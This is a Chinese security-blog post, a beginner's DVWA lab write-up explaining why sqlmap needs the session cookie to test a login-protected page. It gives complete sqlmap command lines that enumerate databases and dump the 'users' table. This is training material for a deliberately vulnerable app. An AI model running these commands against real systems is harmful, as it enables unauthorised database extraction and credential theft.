freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

DVWA sqlmap_cookie篇
0ne_Rn 2021-08-03 10:36:35 145183

靶场:DVWA_sql injection_low

问题解决:为什么SQLmap有时要带cookie

除手工注入外看到一些师傅还用sqlmap跑了跑,
遂直接按照做sqli-labs方法直接复制url去了
clipboard.png结果不太可,,莫得想要的

后来发现(piaowp):
SQLMAP直接使用url来进行注入,因为之前没有登录DVWA所以被重定向到login.php界面,直接注入失败

所以学习思路,抓包发现cookie:
clipboard.png
了解原理后带上cookie暴起来:

tips:命令注意

√:python2 sqlmap.py -u"http://dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=7u0ls6vq17jvi44q79g3p4tij3; security=low" -dbs --batch

×:python2 sqlmap.py -u"http://dvwa/vulnerabilities/sqli/?id=1&Submit=Submit"--cookie="PHPSESSID=7u0ls6vq17jvi44q79g3p4tij3; security=low" -dbs --batch

发现了吗?
仅仅是一个空格的问题
image.png但是下面的语句就是不出东西,
所以在使用sqlmap时,如果不确定符号问题直接查,或许问题就在空格或单双横杠问题上
image.png成功暴库
所以在需要登录的环境中带上cookie进行查询

暴表
image.png暴字段
image.png暴内容(dump牛逼)
命令:
python2 sqlmap.py -u"http://dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=7u0ls6vq17jvi44q79g3p4tij3; security=low" --dump -T"users" -D"dvwa" --batch
image.png搞定

看的我头皮发麻,,一个SQL注入漏洞让人把裤衩子都扒下来了,,,,,

新手上路,欢迎各位师傅斧正

# 渗透测试 # web安全 # CTF
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 0ne_Rn 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
网络安全
0ne_Rn LV.4
小米应用安全工程师
  • 10 文章数
  • 8 关注者
内网穿透实例练习:setoolKit+花生壳 >钓鱼网站
2021-12-28
Digispark BadUSB详解--从制作到上马测试,近源渗透得力助手
2021-12-18
爱卡汽车网某重要系统设计逻辑缺陷(成功绕过验证码限制)影响内部敏感信息(厂家已修)
2021-11-17